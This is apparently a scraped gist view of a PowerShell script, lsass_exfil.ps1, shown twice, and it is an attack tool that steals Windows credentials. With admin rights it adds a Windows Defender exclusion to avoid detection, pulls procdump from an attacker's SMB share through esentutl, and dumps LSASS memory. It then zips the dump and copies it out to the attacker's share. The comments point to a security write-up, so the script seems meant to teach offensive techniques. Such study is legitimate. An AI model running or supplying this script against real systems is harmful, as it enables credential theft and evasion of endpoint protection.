tokyoneon · November 16, 2020 17:07
diff --git a/lsass_exfil.ps1 b/lsass_exfil.ps1
 # write-up: https://www.varonis.com/blog/author/tokyoneon/

 # an if statement to prevent the attack from executing without administrator privileges
 if (whoami /groups | findstr /i "S-1-16-12288")
 {
 	# start the attack as a background processs to prevent the PS terminal from stalling when opened
 	Start-Job {
 		# where to write data during the attack?
 		$temp = "$env:TEMP"

 		# create path exclusion in Windows Defender to prevent procdump detection
 		Add-MpPreference -ExclusionPath $temp
 		
 		# sleep several seconds to allow the path exclusion to take effect
 		Start-Sleep -s 4

 		# the attacker's IP address
 		$server = "192.168.56.101"

 		# the attacker's SMB share name, must match impacket-smbserver share name
 		$share = "evilshare"

 		# procdump filename as it appears on the attacker's SMB share
 		$procdump = "procdump.exe"

 		# procdump.exe is saved locally with a random string as the filename
 		$filename = (-join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object { [char]$_ })) + '.exe'

 		# the procdump output path when saved locally; shameless username plug
 		$dump = "tokyoneon.dmp"

 		# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
 		$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"

 		# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
 		esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o

 		# execute procdump and dump LSASS memory
 		& $temp\$filename -accepteula -ma lsass.exe $temp\$dump

 		# suppress progress bar that appears in the terminal when compressing the dump
 		$ProgressPreference = "SilentlyContinue"

 		# compress the dump
 		Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force

 		# exfiltrate the compressed dump to the attacker's SMB share via cp
 		cp $temp\$exfil \\$server\$share\$exfil } | Out-Null
 }
	# write-up: https://www.varonis.com/blog/author/tokyoneon/

	# an if statement to prevent the attack from executing without administrator privileges
	if (whoami /groups \| findstr /i "S-1-16-12288")
	{
	# start the attack as a background processs to prevent the PS terminal from stalling when opened
	Start-Job {
	# where to write data during the attack?
	$temp = "$env:TEMP"

	# create path exclusion in Windows Defender to prevent procdump detection
	Add-MpPreference -ExclusionPath $temp

	# sleep several seconds to allow the path exclusion to take effect
	Start-Sleep -s 4

	# the attacker's IP address
	$server = "192.168.56.101"

	# the attacker's SMB share name, must match impacket-smbserver share name
	$share = "evilshare"

	# procdump filename as it appears on the attacker's SMB share
	$procdump = "procdump.exe"

	# procdump.exe is saved locally with a random string as the filename
	$filename = (-join ((65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object { [char]$_ })) + '.exe'

	# the procdump output path when saved locally; shameless username plug
	$dump = "tokyoneon.dmp"

	# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
	$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"

	# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
	esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o

	# execute procdump and dump LSASS memory
	& $temp\$filename -accepteula -ma lsass.exe $temp\$dump

	# suppress progress bar that appears in the terminal when compressing the dump
	$ProgressPreference = "SilentlyContinue"

	# compress the dump
	Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force

	# exfiltrate the compressed dump to the attacker's SMB share via cp
	cp $temp\$exfil \\$server\$share\$exfil } \| Out-Null
	}